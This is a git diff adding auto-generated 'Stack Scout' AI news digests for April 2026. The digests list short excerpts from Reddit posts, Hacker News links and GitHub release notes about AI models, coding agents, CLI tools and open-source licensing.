Hel2: Claude Code CLI \- Hel1: Cursor CLI \- Mainframe: OpenCode They talk to each other over fleet MCP. Each has its own vector memory (Qdrant), runs its own tasks, and reports back to me on Telegram or work with each other from one point of contact. Same JARVIS, different hands. They don't just run. They coordinate. Video is all 3 tmux sessions open at o + +--- + +## [Openclaw real costs: self hosting vs managed hosting vs API fees](https://reddit.com/r/ChatGPT/comments/1sj6r9b/openclaw_real_costs_self_hosting_vs_managed/) +*Reddit r/ChatGPT* | 12/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> Everyone says openclaw is free and open source but what's the real monthly cost when you add everything up? Hosting, API fees, whatever else. How much are people paying for self-hosting vs managed and is the price difference worth? + +--- + +## [OK I installed bitsandbytes but still getting error - Help please - thanks](https://reddit.com/r/StableDiffusion/comments/1sj1gi9/ok_i_installed_bitsandbytes_but_still_getting/) +*Reddit r/StableDiffusion* | 12/04/2026 | Score: 1.00 +Tags: product_launch, cli_tool + +> Used terminal and installed it like so: pip install --force-reinstall [https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release\_main/bitsandbytes-1.33.7.preview-py3-none-win\_amd64.whl](https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release_main/bitsandbytes-1.33.7.preview-py3-none-win_amd64.whl) Getting error and StableDiffusion does not run File "C:\\Users\\123\\Downloads\\StabilityMatrix-win-x64\\Data\\Packages\\ + +--- + +## [Meta released new paper : Neural Computers](https://reddit.com/r/LocalLLaMA/comments/1sj782l/meta_released_new_paper_neural_computers/) +*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 +Tags: cli_tool + +> What they wish to convey is can AI act like a computer? the team tried training a video model to generate simulation for terminal and desktop and got decent results. check more details : https://youtu.be/Evcgg-LG\_jA?si=0h0bnM7qUsqDcKCJ paper : https://arxiv.org/abs/2604.06425 + +--- + +## [Open source agent stack that actually works in 2026 (no hype)](https://reddit.com/r/LocalLLaMA/comments/1sj6ke6/open_source_agent_stack_that_actually_works_in/) +*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 +Tags: open_source + +> been running this setup for a few months and wanted to share what actually works vs whats just github stars hermes agent (24k stars, MIT) - runs on your own machine or vps, connects to telegram/discord/whatsapp, persistent memory stored locally in sqlite. your data doesnt leave your network. pair it with ollama and local models for fully offline operation. the memory layer is what separates it from everything else.. your agent on day 30 actually knows your projects and preferences everything c + +--- + +## [MiniMax M2.7 is NOT open source - DOA License :(](https://reddit.com/r/LocalLLaMA/comments/1sj2oqz/minimax_m27_is_not_open_source_doa_license/) +*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 +Tags: open_source + +> Commercial use is banned without prior written permission from MiniMax. And their definition of "commercial" is broad - covers paid services, commercial APIs, and even deploying a fine-tuned version for profit. Military use is also explicitly prohibited- interesting. So you can't use the model or any outputs for anything commercial! I'm really starting to hate these "open weights, closed license" models... https://huggingface.co/MiniMaxAI/MiniMax-M2.7/blob/main/LICENSE + +--- + +## [Does LTX 2.3 have good motion transfer?](https://reddit.com/r/StableDiffusion/comments/1sj87tk/does_ltx_23_have_good_motion_transfer/) +*Reddit r/StableDiffusion* | 12/04/2026 | Score: 0.94 +Tags: open_source + +> What are the best open source motion transfer workflows and models right now? Is it still Wan + SCAIL? Or LTX 2.3 have a better one? + +--- + +## [This is so good](https://reddit.com/r/ClaudeAI/comments/1sj3icv/this_is_so_good/) +*Reddit r/ClaudeAI* | 12/04/2026 | Score: 0.86 +Tags: api_update + +> Claude code just created a whole gamified experience in the web. for my baby baby shower. Unique ids admin ui with count of RSVP the whole thing. All canvas over html in around 3 hrs because I tweaked a lot and also developed the whole api in c++ and published it to a domain created an AWS cloud front and managed to tied it to email sending. I’m officially wowed. + +--- + +## [It seems ChatGPT leaked a JSON response (including API enpoint)](https://reddit.com/r/ChatGPT/comments/1siyuyb/it_seems_chatgpt_leaked_a_json_response_including/) +*Reddit r/ChatGPT* | 12/04/2026 | Score: 0.86 +Tags: api_update + +> idk if this is visible in network requests, but chatgpt responded with \[Errno fetch [http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker\_convo2im](http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker_convo2im) failed: 429: b'{\\n "error": {\\n "message": "You're generating images too quickly. To ensure the best experience for everyone, we have rate limits in place. Please wait for 9 minutes before generating more images.",\\n "type": "images",\\n "param": nul + +--- + +## [MiniMax M2.7 Is Now Open Source](https://firethering.com/minimax-m2-7-agentic-model/) +*Hacker News* | 12/04/2026 | Score: 0.74 +Tags: open_source + +--- + diff --git a/data/digest-2026-04-14.md b/data/digest-2026-04-14.md new file mode 100644 index 0000000..3c0afc1 --- /dev/null +++ b/data/digest-2026-04-14.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-14** | 15 stories | Auto-generated from 271 archived stories + +--- + +## [hands on workshop: context engineering for multi agent systems [D]](https://reddit.com/r/MachineLearning/comments/1skf122/hands_on_workshop_context_engineering_for_multi/) +*Reddit r/MachineLearning* | 13/04/2026 | Score: 1.00 +Tags: api_update, mcp, tool_update, agent_tool + +> hey everyone, sharing this because it's directly relevant to what a lot of people here are building. packt publishing is running a hands on workshop on april 25 on context engineering for multi agent systems with denis rothman. what gets covered: \- semantic blueprints for multi agent orchestration \- MCP integration for standardized agent tool use \- context window management across agents \- high fidelity RAG pipelines with verifiable citations \- safeguards against prompt injection and + +--- + +## [Docker sandbox templates for running Claude Code with a web/mobile UI (CloudCLI)](https://reddit.com/r/ClaudeAI/comments/1slld23/docker_sandbox_templates_for_running_claude_code/) +*Reddit r/ClaudeAI* | 14/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> I maintain CloudCLI, an open source web/mobile UI for AI Coding agents like Claude Code, Gemini and Codex (https://github.com/siteboon/claudecodeui if you are not aware) We recently added Docker Sandbox support and I wanted to share it here. The idea is simple, Docker sandbox allows you to run agents in an isolated environment and we've created a template to also add a webui on top of it and interact with your sandbox instead of a terminal. `npx @cloudcli-ai/cloudcli@latest sandbox ~/my-proje + +--- + +## [How to make Codex (or any agent) do your work without any instructions (it learns by watching you!). Open-source](https://reddit.com/r/ChatGPT/comments/1sljafu/how_to_make_codex_or_any_agent_do_your_work/) +*Reddit r/ChatGPT* | 14/04/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Hiii - here is a simple demo of how AgentHandover watches my screen and then instructs AI agent to do it like me without me explaining. AgentHandover watches how you work on your Mac, turns your workflows into reusable Skills, and lets agents like Codex, OpenClaw, etc. can execute them the way you do it by just typing /ah-skill-name and watch it do the magic. Each Skill captures the what, the why, and the how - steps, strategy, decision logic, guardrails, and your writing voice. And they're s + +--- + +## [pnpm v10.33.0 released](https://github.com/pnpm/pnpm/releases/tag/v10.33.0) +*GitHub Releases · pnpm* | 24/03/2026 | Score: 0.99 +Tags: developer_tool, cli_tool + +> ## Minor Changes * Added a new `dedupePeers` setting that reduces peer dependency duplication. When enabled, peer dependency suffixes use version-only identifiers (`name@version`) instead of full dep paths, eliminating nested suffixes like `(foo@1.0.0(bar@2.0.0))`. This dramatically reduces the number of package instances in projects with many recursive peer dependencies [#11070](https://github.com/pnpm/pnpm/issues/11070). ## Patch Changes * Fail on incompatible lockfiles in CI when + +--- + +## [Gemini CLI v0.37.2 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.37.2) +*GitHub Releases · Gemini CLI* | 13/04/2026 | Score: 0.92 +Tags: cli_tool, tool_update + +> ## What's Changed * fix(patch): cherry-pick 9d741ab to release/v0.37.1-pr-24565 to patch version v0.37.1 and create version 0.37.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25322 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.37.1...v0.37.2 + +--- + +## [Turbo v2.9.6 released](https://github.com/vercel/turborepo/releases/tag/v2.9.6) +*GitHub Releases · Turbo* | 10/04/2026 | Score: 0.92 +Tags: github_release, tool_update + +> ## What's Changed ### create-turbo * chore: Update dependencies found in audits by @anthonyshew in https://github.com/vercel/turborepo/pull/12586 ### Examples * fix: Add missing `@types/node` to `with-svelte` example apps by @anthonyshew in https://github.com/vercel/turborepo/pull/12585 ### Changelog * docs: Add Bun equivalent for updating dependencies by @anthonyshew in https://github.com/vercel/turborepo/pul + +--- + +## [We're all building on top of something that changes under us every week, and nobody has a plan for that](https://reddit.com/r/ClaudeAI/comments/1sl3yzt/were_all_building_on_top_of_something_that/) +*Reddit r/ClaudeAI* | 14/04/2026 | Score: 0.90 +Tags: api_update, tool_update + +> I've been using Claude (Pro, now Max) for about 7 months, primarily for building and shipping small tools and automations for clients. I'm not complaining about Claude itself here , this is about a pattern I'm noticing across the entire AI tooling ecosystem that I think deserves a real conversation. Every week, something changes. A model gets updated and suddenly the same prompt that worked reliably for two months produces different output. An API response structure shifts slightly. A feature g + +--- + +## [Vercel CLI vercel@51.2.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.2.1) +*GitHub Releases · Vercel CLI* | 14/04/2026 | Score: 0.84 +Tags: api_update, cli_tool + +> ### Patch Changes - Add `ai-gateway api-keys create` command for creating AI Gateway API keys with optional quota limits ([#15744](https://github.com/vercel/vercel/pull/15744)) - Improve `vercel blob list-stores` with `--json` and `--no-projects`, exclude non-blob stores when the API returns a `type` field, and show a richer table for non-TTY output while keeping linked-project filtering, `--all`, and interactive store selection on TTY. ([#14653](https://github.com/vercel/vercel/pull/14653 + +--- + +## [Gemini CLI v0.38.0 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.0) +*GitHub Releases · Gemini CLI* | 15/04/2026 | Score: 1.00 +Tags: cli_tool + +> ## What's Changed * fix(cli): refresh slash command list after /skills reload by @NTaylorMullen in https://github.com/google-gemini/gemini-cli/pull/24454 * Update README.md for links. by @g-samroberts in https://github.com/google-gemini/gemini-cli/pull/22759 * fix(core): ensure complete_task tool calls are recorded in chat history by @abhipatel12 in https://github.com/google-gemini/gemini-cli/pull/24437 * feat(policy): explicitly allow web_fetch in plan mode with ask_user by @Adib234 in https:// + +--- + +## [My first impressions of Minimax M2.7 (Q5_K_M) vs Qwen 3.5 27b (Q8_0)](https://reddit.com/r/LocalLLaMA/comments/1slm3si/my_first_impressions_of_minimax_m27_q5_k_m_vs/) +*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 +Tags: api_update + +> I'm not sure if the AesSedai's Q5\_K\_M version of Minimax M2.7 is too much lobotomized or if the model itself is kind of weak. I did a simple experiment with both models running with the recommended parameters. The task was simply to generate some [AGENTS.md](http://AGENTS.md) files for a Python/Fast API/LangGraph project of mine (Roo Code /init command), which has some degree of complexity. Minimax runs painfully slowly on my setup, so I was expecting it to demolish Qwen 3.5... but + +--- + +## [Refusal in open-weights models looks like a sparse gate -> amplifier circuit, and generalizes across 12 models from 6 labs (2B-72B)](https://reddit.com/r/LocalLLaMA/comments/1sllajh/refusal_in_openweights_models_looks_like_a_sparse/) +*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 +Tags: open_source + +> Paper: [https://arxiv.org/abs/2604.04385](https://arxiv.org/abs/2604.04385) I've been trying to understand where refusal actually lives. How it works mechanistically. Arditi et al showed refusal can be steered with a single direction. What I looked at here is the mechanistic question: what circuit creates and amplifies that direction? Main result: Across 12 models from 6 labs, I keep finding a sparse **gate-amplifier** pattern. A mid-layer 'gate' attention head reads a detection-layer represe + +--- + +## [Tencent HY-World 2.0 appears to be dropping on April 15 — open-source multimodal 3D world generation from Tencent Hunyuan](https://reddit.com/r/StableDiffusion/comments/1sll638/tencent_hyworld_20_appears_to_be_dropping_on/) +*Reddit r/StableDiffusion* | 14/04/2026 | Score: 1.00 +Tags: open_source + +> Tencent’s Hunyuan team is apparently releasing **HY-World 2.0 tomorrow**, according to a teaser post from Tengfei Wang (Tencent Hunyuan): “Launching tomorrow — Tencent #HYWorld 2.0, an engine-ready World Model" [Source](https://x.com/DylanTFWang/status/2043952886166761519) The launch page is already live, and this looks like a major upgrade over HY-World 1.5 / WorldPlay. ## What HY-World 2.0 does HY-World 2.0 is a multimodal world model that can generate persistent, explorable 3D environments + +--- + +## [Updated Minimax m2.7 still doesn't allow coding a product. But before the next riot starts, Ryan Lee has already confirmed that they are still working on the license, and sale of products built by m2.7 is permitted.](https://reddit.com/r/LocalLLaMA/comments/1slkjqp/updated_minimax_m27_still_doesnt_allow_coding_a/) +*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 +Tags: tool_update + +> Reddit r/LocalLLaMA — 9 upvotes, 14 comments + +--- + +## [2x Asus Ascent GX10 - MiniMax M2.7 AWQ - cloud providers are dead to me](https://reddit.com/r/LocalLLaMA/comments/1sli7xr/2x_asus_ascent_gx10_minimax_m27_awq_cloud/) +*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 +Tags: agent_tool + +> Hello, I've been on a quest to get something "close enough" of Opus 4.5 running locally, for agentic coding, as SWE with 15 years of experience. I tried with one spark (yeah I'm calling my Asus Ascent GX10 sparks - they're the same), with models like Qwen 3.5 122B-A10B, Qwen3-Coder-Next, M2.5-REAP, ... Nothing was scratching the itch, too much frustration. 128GB is simply not enough (for me) right now. So I bought a second one (first one I paid 2800€, second one 2500€, plus 60€ cable - total + +--- + +## [Parisians: we're running an open source AI art hackathon with LTX + NVIDIA this Saturday](https://reddit.com/r/StableDiffusion/comments/1slgzja/parisians_were_running_an_open_source_ai_art/) +*Reddit r/StableDiffusion* | 14/04/2026 | Score: 1.00 +Tags: open_source + +> Hack and train on H100s for a day w/ people from the open source community + reserachers. Full details [here](https://ados.events/hackathon) + +--- + diff --git a/data/digest-2026-04-15.md b/data/digest-2026-04-15.md new file mode 100644 index 0000000..fd9b9a8 --- /dev/null +++ b/data/digest-2026-04-15.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-15** | 15 stories | Auto-generated from 418 archived stories + +--- + +## [Qwen Code v0.14.5 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.14.5) +*GitHub Releases · Qwen Code* | 15/04/2026 | Score: 1.00 +Tags: api_update, developer_tool, cli_tool + +> ## What's Changed * feat(cli/sdk): expose /context usage data in non-interactive mode and SDK API by @wenshao in https://github.com/QwenLM/qwen-code/pull/2916 * feat(cli): add startup performance profiler by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3232 * feat(core): implement fork subagent for context sharing by @wenshao in https://github.com/QwenLM/qwen-code/pull/2936 * feat(vscode-ide-companion): add /account for account display by @qqqys in https://github.com/QwenLM/qwen-code/p + +--- + +## [MCP vs API?](https://reddit.com/r/ClaudeAI/comments/1slr3qj/mcp_vs_api/) +*Reddit r/ClaudeAI* | 15/04/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> I am trying to get deeper into utilizing Claude Code (trying to become more technical) as I have recently switched to the terminal and wanted some feedback on better understanding MCP vs APIs. To me it seems like APIs are direct instructions on how to navigate and pull or push data between a product and another entity. MCP on the other hand seems like it is allowing the AI to dynamically use tools and definitions based on your current context. I have heard a lot of people say that API is + +--- + +## [Built a Visual Studio Code extension to use OpenCode as a GUI sidebar instead of the terminal](https://reddit.com/r/LocalLLaMA/comments/1sml59n/built_a_visual_studio_code_extension_to_use/) +*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 +Tags: developer_tool, cli_tool + +> Hey everyone, I built a VS Code extension that brings OpenCode directly into your sidebar as a native panel, that uses the UI elements exactly as they are from the OpenCode Desktop app. No terminal needed, no browser tab. It just lives in your activity bar and works easily. What it does: * Runs OpenCode sessions inside a VS Code webview sidebar * Automatically uses whatever workspace folder you have open * Can auto-start a local OpenCode server when you open the sidebar * Keeps your session a + +--- + +## [Open Ai Agent Dashboard for Monitoring, Memory, Performance and Audit Trail](https://reddit.com/r/ChatGPT/comments/1sm2bkg/open_ai_agent_dashboard_for_monitoring_memory/) +*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Been building AI agents for about a year now and the thing that always drove me crazy is you deploy an agent, it runs for hours, and you have absolutely no idea what it did. The logs say "task complete" 47 times but did it actually do 47 different things or did it just loop the same task over and over? I had an agent burn through about $340 in API credits over a weekend because it got stuck retrying the same request. The logs showed 200 OK on every call. Everything looked fine. It just kept doi + +--- + +## [[P] Added 8 Indian languages to Chatterbox TTS via LoRA — 1.4% of parameters, no phoneme engineering [P]](https://reddit.com/r/MachineLearning/comments/1sltun8/p_added_8_indian_languages_to_chatterbox_tts_via/) +*Reddit r/MachineLearning* | 15/04/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> TL;DR: Fine-tuned Chatterbox-Multilingual (Resemble AI's open-source TTS) to support Telugu, Kannada, Bengali, Tamil, Malayalam, Marathi, Gujarati, and Hindi using LoRA adapters + tokenizer extension. Only 7.8M / 544M parameters trained. Model + audio samples available. \--- The Problem Chatterbox-Multilingual supports 23 languages with zero-shot voice cloning, but no Dravidian languages (Telugu, Kannada, Tamil, Malayalam) and limited Indo-Aryan coverage beyond Hindi. That's 500M+ speakers + +--- + +## [Claude Code on desktop, redesigned for parallel agentic work.](https://reddit.com/r/ClaudeAI/comments/1slictc/claude_code_on_desktop_redesigned_for_parallel/) +*Reddit r/ClaudeAI* | 14/04/2026 | Score: 0.99 +Tags: developer_tool, cli_tool + +> New sidebar for parallel sessions. Drag-and-drop layout. Integrated terminal. Run multiple agents from one window. New tools make it easier to complete work without leaving the app. Integrated terminal, in-app file editing, HTML + PDF preview, and a rebuilt diff viewer. Drag any panel into the layout that fits how you work. Three view modes when you want more (or less) signal. Plus more updates and customizations to fit how you work including SSH for Mac, keyboard shortcuts, and CLI plugin p + +--- + +## [I built a CLI that scans your project and auto-installs matching skills for Claude Code](https://reddit.com/r/ClaudeAI/comments/1sm4at4/i_built_a_cli_that_scans_your_project_and/) +*Reddit r/ClaudeAI* | 15/04/2026 | Score: 0.96 +Tags: developer_tool, cli_tool + +> Hey r/ClaudeAI — I built a small tool to fix something that bugged me: every time I start a new project, picking the right skills from [skills.sh](http://skills.sh) is manual and slow. skillgrab does this: 1. Scans \`package.json\`, \`requirements.txt\`, \`pubspec.yaml\`, \`go.mod\`, \`Dockerfile\`, \`vercel.json\`, etc. to detect your stack 2. Reads your README for non-code hints ("landing page", "pricing", "SEO") and asks if you want marketing/design/sales skills 3. Queries [skills.sh] + +--- + +## [Gemini CLI v0.38.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.1) +*GitHub Releases · Gemini CLI* | 15/04/2026 | Score: 0.92 +Tags: cli_tool, tool_update + +> ## What's Changed * fix(patch): cherry-pick 050c303 to release/v0.38.0-pr-25317 to patch version v0.38.0 and create version 0.38.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25466 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.0...v0.38.1 + +--- + +## [MidJourney V8.1 Alpha Has Just Been Released. How Much Improvement Does It Have?](https://reddit.com/r/midjourney/comments/1smlk07/midjourney_v81_alpha_has_just_been_released_how/) +*Reddit r/midjourney* | 15/04/2026 | Score: 1.00 +Tags: product_launch + +> A new r/midjourney version always creates excitement. Beautiful sample images start appearing everywhere, people begin testing it immediately, and the usual question follows: **Is it really better, or is it just new?** With MidJourney V8.1 Alpha now available, I wanted to look beyond the hype and test it in a more practical way. Instead of judging it in isolation, I compared it against two other strong image models available today: **Nano Banana 2** and **Grok Imagine 1.0.** The goal was sim + +--- + +## [Great news, everyone. If you were sick of the condescending 5.2 model, creators have announced 5.3, with a less preachy tone. I have tested it over the last few days and it has become more balanced.](https://reddit.com/r/ChatGPT/comments/1smkzda/great_news_everyone_if_you_were_sick_of_the/) +*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 +Tags: tool_update + +> I noticed a change from the condescending, sometimes rude and persistent looping behaviour of ChatGPT 5.2, so I asked Google about it and got this confirmation back that in March they updated to 5.3. I think I'm starting to receive that model now because it's become less preachy and isn't looping into psychoanalysis of me every time I talk to it. ChatGPT has likely felt "nicer" recently due to several updates in early 2026 designed to improve its conversational tone and reduce the rigid, robo + +--- + +## [Qwen3.5 35b is sure still one the best local model (pulling above its weight) - More Details](https://reddit.com/r/LocalLLaMA/comments/1smgqgy/qwen35_35b_is_sure_still_one_the_best_local_model/) +*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 +Tags: cli_tool + +> Last time I posted on how this model has performed in creating the webapp based on provided research paper. I got so much love to see people has appreciated the post and of-course the potential of this MOE model. I am sharing details on how I used this model to create webapp just using prompt and step by step guiding it. Later I converted my guidance steps into skills using same qwen-code cli with this model, that helped to add more examples. Here is github repo where I have added the [researc + +--- + +## [Is it possible for an open-source AI that you run at home to become as powerful as that of chatgpt and others at that level?](https://reddit.com/r/ChatGPT/comments/1smepps/is_it_possible_for_an_opensource_ai_that_you_run/) +*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 +Tags: open_source + +> What would need to be true for someone to be able to run something that powerful entirely from home? Do they just need the correct weights? Assume that they don't need to do training (maybe some tech enthusiast does the training and just hands off the built model to people). Would storage space be a constraint? How much storage would they need? And how much RAM would they need? This is all for 1 person using it, not like the person would be serving an AI service out of their garage or something + +--- + +## [Lyra 2.0 : Explorable Generative 3D Worlds](https://reddit.com/r/StableDiffusion/comments/1smbyjf/lyra_20_explorable_generative_3d_worlds/) +*Reddit r/StableDiffusion* | 15/04/2026 | Score: 1.00 +Tags: developer_tool + +> Nvidia released **Lyra 2.0**, a framework for generating persistent, explorable 3D worlds at scale, from NVIDIA Research. Generating large-scale, complex environments is difficult for AI models. Current models often “forget” what spaces look like and lose track of movement over time, causing objects to shift, blur, or appear inconsistent. This prevents them from creating the reliable 3D environments required for downstream simulations. Lyra 2.0 solves these issues by: Maintaining per- + +--- + +## [[P] Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book](https://reddit.com/r/LocalLLaMA/comments/1sm82ze/p_built_gpt2_llama_3_and_deepseek_from_scratch_in/) +*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 +Tags: open_source + +> I wrote a book that implements modern LLM architectures from scratch. The part most relevant to this sub: Chapter 3 takes GPT-2 and swaps exactly 4 things to get Llama 3.2-3B: 1. LayerNorm → RMSNorm 2. Learned positional encodings → RoPE 3. GELU → SwiGLU 4. Multi-Head Attention → Grouped-Query Attention Then loads Meta's real pretrained weights. Chapter 5 builds DeepSeek's full architecture: MLA with the absorption trick, decoupled RoPE, MoE with shared experts and fine-grained segmentation, + +--- + +## [Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book [p]](https://reddit.com/r/MachineLearning/comments/1sm75yf/built_gpt2_llama_3_and_deepseek_from_scratch_in/) +*Reddit r/MachineLearning* | 15/04/2026 | Score: 1.00 +Tags: open_source + +> I spent the past year implementing five LLM architectures from scratch in PyTorch and wrote a book documenting the process. What's covered: * Vanilla encoder-decoder transformer (English to Hindi translation) * GPT-2 (124M), loading real OpenAI pretrained weights * Llama 3.2-3B, showing the exact 4 component swaps from GPT-2 (RMSNorm, RoPE, SwiGLU, GQA), loading Meta's pretrained weights * KV cache mechanics, MQA, GQA * DeepSeek: Multi-Head Latent Attention with absorption trick and decoupled + +--- + diff --git a/data/digest-2026-04-16.md b/data/digest-2026-04-16.md new file mode 100644 index 0000000..7f5aad9 --- /dev/null +++ b/data/digest-2026-04-16.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-16** | 15 stories | Auto-generated from 396 archived stories + +--- + +## [Vercel CLI vercel@51.5.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.5.1) +*GitHub Releases · Vercel CLI* | 16/04/2026 | Score: 0.92 +Tags: developer_tool, cli_tool, tool_update + +> ### Patch Changes - Improve Claude Code Vercel plugin install and update prompts across CLI commands. ([#15921](https://github.com/vercel/vercel/pull/15921)) - Updated dependencies \[[`5219572d21a2ba4b49cc1c27d244c1ff5d76c591`](https://github.com/vercel/vercel/commit/5219572d21a2ba4b49cc1c27d244c1ff5d76c591), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://github.com/vercel/vercel/commit/2babfa22946d80a92f1307a8d860a9039d695b09), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://gi + +--- + +## [I got tired of copying/pasting between ChatGPT and X, so I built an extension that brings the AI directly into the timeline](https://reddit.com/r/ChatGPT/comments/1snf7bl/i_got_tired_of_copyingpasting_between_chatgpt_and/) +*Reddit r/ChatGPT* | 16/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I use ChatGPT to help draft posts or brainstorm replies, but the workflow of copying tweets, pasting them into ChatGPT, asking it to reply, and then pasting it back into Twitter was driving me crazy. Also, it almost always sounds like a generic robot So, I built **Tweetback**, a Chrome/Edge/Firefox extension that brings your API key directly into the X/Twitter interface. I wanted to see how far I could push the AI to actually understand context and sound human. Here is what it can do: **"Clon + +--- + +## [anyone else notice labs are getting more secretive about their best models?](https://reddit.com/r/ChatGPT/comments/1sn599k/anyone_else_notice_labs_are_getting_more/) +*Reddit r/ChatGPT* | 16/04/2026 | Score: 1.00 +Tags: product_launch, open_source + +> something shifted recently and i can't stop thinking about it. the trend used to be: new model drops, blog post goes up, everyone gets access on day one. now it feels like the most capable stuff is quietly going behind walls with "restricted access" or gated research programs, while the public-facing releases are... fine, but clearly not the frontier. google dropped gemma 4 open-weight and it's genuinely good — MoE architecture, strong reasoning, apache license. meta's doing multimodal reasonin + +--- + +## [Mozilla Announces "Thunderbolt" As An Open-Source, Enterprise AI Client](https://reddit.com/r/LocalLLaMA/comments/1sn4ibj/mozilla_announces_thunderbolt_as_an_opensource/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: product_launch, open_source + +> Reddit r/LocalLLaMA — 4 upvotes, 3 comments + +--- + +## [Qwen3.6-35B-A3B released!](https://reddit.com/r/LocalLLaMA/comments/1sn3izh/qwen3635ba3b_released/) +*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Meet Qwen3.6-35B-A3B:Now Open-Source!🚀🚀 A sparse MoE model, 35B total params, 3B active. Apache 2.0 license. \- Agentic coding on par with models 10x its active size \- Strong multimodal perception and reasoning ability \- Multimodal thinking + non-thinking modes Efficient. Powerful. Versatile. Blog:https://qwen.ai/blog?id=qwen3.6-35b-a3b Qwen Studio:chat.qwen.ai HuggingFace:https://huggingface.co/Qwen/Qwen3.6-35B-A3B ModelScope:https://modelscope.cn/models/Qwen/Qwen3.6-35B-A3B + +--- + +## [Built a visual memory layer for Claude — see what Claude remembers about your projects (open source, free, WIP)](https://reddit.com/r/ClaudeAI/comments/1smzaxb/built_a_visual_memory_layer_for_claude_see_what/) +*Reddit r/ClaudeAI* | 16/04/2026 | Score: 1.00 +Tags: mcp, open_source + +> Claude already has memory — but it's a black box. You can't see what it knows, what decisions were made, or how your project is progressing. Dendrite makes Claude's memory visible. How it works: - Claude writes structured memory slices via MCP (decisions, observations, tasks, open questions) - You see everything in a searchable 3-pane reader - Set your own preferences that Claude pulls from on every session - Track project progress, o + +--- + +## [Built an political benchmark for LLMs. KIMI K2 can't answer about Taiwan (Obviously). GPT-5.3 refuses 100% of questions when given an opt-out. [P]](https://reddit.com/r/MachineLearning/comments/1smqsbu/built_an_political_benchmark_for_llms_kimi_k2/) +*Reddit r/MachineLearning* | 16/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> I spent the few days building a benchmark that maps where frontier LLMs fall on a 2D political compass (economic left/right + social progressive/conservative) using 98 structured questions across 14 policy areas. I tested GPT-5.3, Claude Opus 4.6, and KIMI K2. The results are interesting. **The repo is fully open-source -- run it yourself on any model with an API:** [https://github.com/dannyyaou/llm-political-eval](https://github.com/dannyyaou/llm-political-eval) **The headline finding + +--- + +## [Keycard – inject API keys into subprocesses, never touch shell env](https://www.keycard.studio/) +*Hacker News* | 16/04/2026 | Score: 0.97 +Tags: api_update, cli_tool + +--- + +## [I turned my MacBook notch into a live Claude Code dashboard](https://reddit.com/r/ClaudeAI/comments/1smm0mo/i_turned_my_macbook_notch_into_a_live_claude_code/) +*Reddit r/ClaudeAI* | 16/04/2026 | Score: 0.91 +Tags: api_update, cli_tool + +> Notch Pilot lives in the MacBook notch (no menu bar icon, no dock icon) and shows: * Live 5-hour session % + weekly limits — the exact numbers from your Claude account page, pulled from the same oauth/usage endpoint Claude Code uses. * Permission prompts rendered inline — shell commands get a code block, file edits get a red/green diff, URLs get parsed. Deny / Allow / Always allow, with "always allow" writing to \~/.claude/settings.json. * Every live session at a glance — project, model, uptime + +--- + +## [OpenClaw v2026.4.15 released](https://github.com/openclaw/openclaw/releases/tag/v2026.4.15) +*GitHub Releases · OpenClaw* | 16/04/2026 | Score: 0.84 +Tags: developer_tool, cli_tool + +> ### Changes - Anthropic/models: default Anthropic selections, `opus` aliases, Claude CLI defaults, and bundled image understanding to Claude Opus 4.7. - Google/TTS: add Gemini text-to-speech support to the bundled `google` plugin, including provider registration, voice selection, WAV reply output, PCM telephony output, and setup/docs guidance. (#67515) Thanks @barronlroth. ### Fixes - Agents/skills: sort prompt-facing `available_skills` entries by skill name after merging sources so `skills. + +--- + +## [Crush v0.59.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.59.0) +*GitHub Releases · Crush* | 16/04/2026 | Score: 0.84 +Tags: cli_tool, tool_update + +> ## Changelog ### New! * 3773b23cb44afc4567d892f01c41c8dc62556ca0: feat(shell): add jq as a bash builtin + a jq skill for it (@meowgorithm) * b37649e45299d426aeae73a54efc0d1155fb5c91: feat(ui): add skills discovery status to sidebar and landing page (#2384) (@huaiyuWangh) * e8f5e2025d2401ffe06123c42226f3b7a20abe3a: feat: show progress bar on rio terminal (#2624) 